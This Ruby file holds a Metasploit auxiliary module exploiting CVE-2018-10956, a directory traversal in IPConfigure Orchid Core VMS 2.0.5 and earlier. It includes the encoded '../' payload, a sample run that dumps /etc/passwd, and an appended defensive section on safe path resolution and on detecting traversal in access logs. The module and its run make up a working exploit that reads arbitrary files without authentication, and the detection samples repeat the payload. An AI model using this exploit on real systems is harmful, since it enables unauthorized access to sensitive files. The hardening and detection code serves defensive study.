require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
      'Description'    => %q{
        Orchid Core VMS is vulnerable to a directory traversal attack. This affects
        Linux and Windows operating systems. This allows a remote, unauthenticated
        attacker to send crafted GET requests to the application, which results in
        the ability to read arbitrary files outside of the application's web
        directory. This issue is further compounded as the Linux version of the
        Orchid Core VMS application is running in the context of a user in the
        sudoers group. As such, any file on the underlying system, for which the
        location is known, can be read. This module was tested against 2.0.5.
        This has been fixed in 2.0.6.
      },
      'Author'         => [ 'Sanjiv Kawa @kawabungah' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2018-10956' ],
          [ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
          [ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
        ],
      'DisclosureDate' => 'May 7, 2018'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
        OptString.new('FILE', [true, 'This is the file to download', '/etc/passwd']),
        OptString.new('INPUTFILE', [false, 'Specify a list of files to download']),
        Opt::RPORT(80)
      ], self.class)
  end

  # Issue a plain GET for +path+ and return the response (nil on connection failure)
  def init_request(path)
    send_request_cgi({
      'method' => 'GET',
      'uri'    => path
    })
  end

  def run
    path = normalize_uri(target_uri.path)
    res = init_request(path)

    # Bail out early if the base URI does not answer with HTTP 200
    unless res && res.code == 200
      print_error('Web Server is Unresponsive')
      return
    end

    # Seven URL-encoded "../" sequences, enough to climb to the filesystem root
    trigger = '%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F'

    # Either a single FILE or one path per line from INPUTFILE (newlines stripped,
    # blank lines skipped so they do not end up inside the request URI)
    files =
      if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
        [datastore['FILE']]
      else
        File.readlines(datastore['INPUTFILE']).map(&:strip).reject(&:empty?)
      end

    files.each do |file|
      path = normalize_uri(target_uri.path) + trigger + file
      res = init_request(path)

      # Report the file actually requested, not datastore['FILE'], so that
      # INPUTFILE runs label each result correctly
      if res && res.code == 200
        print_good("Obtained #{file}")
        puts res.body
        puts ''
      else
        print_error("#{file} does not exist")
        puts res.body if res
        puts ''
      end
    end
  end
end

__END__
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options

Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/passwd      yes       This is the file to download
   INPUTFILE                   no        Specify a list of files to downloads
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.100.100.100   yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Orchid VMS
   VHOST                       no        HTTP server virtual host

msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run

[+] Obtained /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
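The module's description explains the bug only at the level of "crafted GET requests with encoded ../ sequences". The Ruby below is an added defender-side example, not part of the module and not IPConfigure's code: it shows why a web root joined naively with a percent-decoded request path lets the seven `%2E%2E%2F` sequences climb out of the document root, what a hardened path resolver has to do to refuse that (decode until stable to defeat double encoding, normalise backslashes for the Windows build, strip leading slashes and `~` before `File.expand_path`, then require the result to stay under the root with a separator-terminated prefix check), and how the same decoder can flag traversal attempts in access-log lines. The document root, the log lines and the hostnames are constructed for the example.

```ruby
# Decode %XX escapes once, working on raw bytes so non-ASCII escapes survive.
def percent_decode(s)
  s.b.gsub(/%([0-9A-Fa-f]{2})/) { [$1.hex].pack('C') }.force_encoding(Encoding::UTF_8)
end

# Decode repeatedly until the string stops changing, so that double-encoded
# sequences such as %252E (-> %2E -> .) are resolved as well. max_rounds bounds
# the work on pathological input.
def fully_decode(path, max_rounds: 5)
  decoded = path
  max_rounds.times do
    nxt = percent_decode(decoded)
    break if nxt == decoded
    decoded = nxt
  end
  decoded
end

# Illustrative naive resolution (not the product's code): root and request path
# are simply joined and normalised, so "../" segments walk out of root.
def naive_resolve(root, request_path)
  File.expand_path(File.join(root, fully_decode(request_path)))
end

# Hardened resolution. Returns the absolute file path if the request stays
# inside root, nil otherwise.
def safe_resolve(root, request_path)
  root = File.expand_path(root)
  decoded = fully_decode(request_path).tr('\\', '/')   # Windows build: treat \ as /
  return nil unless decoded.valid_encoding?
  return nil if decoded.include?("\0")                  # NUL truncation tricks
  rel = decoded.sub(%r{\A/+}, '')                       # a leading / would discard root
  return nil if rel.start_with?('~')                    # expand_path would expand ~user
  candidate = File.expand_path(rel, root)
  # The trailing separator matters: without it "/srv/orchid/web-evil" would pass
  # the check for root "/srv/orchid/web".
  return nil unless candidate == root || candidate.start_with?(root + File::SEPARATOR)
  candidate
end

# Detection: after full decoding, does the path contain a bare ".." segment?
# "app..js" is not a traversal; "/../" or a leading "../" is.
TRAVERSAL_RE = %r{(\A|/)\.\.(/|\z)}

def traversal_attempt?(request_path)
  fully_decode(request_path).tr('\\', '/').match?(TRAVERSAL_RE)
end

# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [07/May/2018:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
  10.0.0.9 - - [07/May/2018:10:00:02 +0000] "GET /%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc/passwd HTTP/1.1" 200 1337
  10.0.0.9 - - [07/May/2018:10:00:03 +0000] "GET /%252E%252E%252Fetc/hosts HTTP/1.1" 404 0
  10.0.0.7 - - [07/May/2018:10:00:04 +0000] "GET /static/app..js HTTP/1.1" 200 99
LOG

# Return the log lines whose request path is a traversal attempt.
def flag_traversal_lines(log)
  log.each_line.filter_map do |line|
    m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP/)
    next unless m
    line.strip if traversal_attempt?(m[1])
  end
end

if __FILE__ == $PROGRAM_NAME
  root = '/srv/orchid/web'   # assumed document root for the example
  probe = '/' + '%2E%2E%2F' * 7 + '/etc/passwd'
  puts "naive:  #{naive_resolve(root, probe)}"
  puts "safe:   #{safe_resolve(root, probe).inspect}"
  puts "legit:  #{safe_resolve(root, '/index.html')}"
  flag_traversal_lines(SAMPLE_LOG).each { |l| puts "FLAGGED: #{l}" }
end
```

Two details are worth noting when reusing the resolver: the prefix check must include the separator, and the decode loop must run before any `..` test, otherwise a single round of decoding misses the `%252E` form entirely. The detection regexp deliberately ignores `..` embedded in a filename so that it does not fire on ordinary static assets.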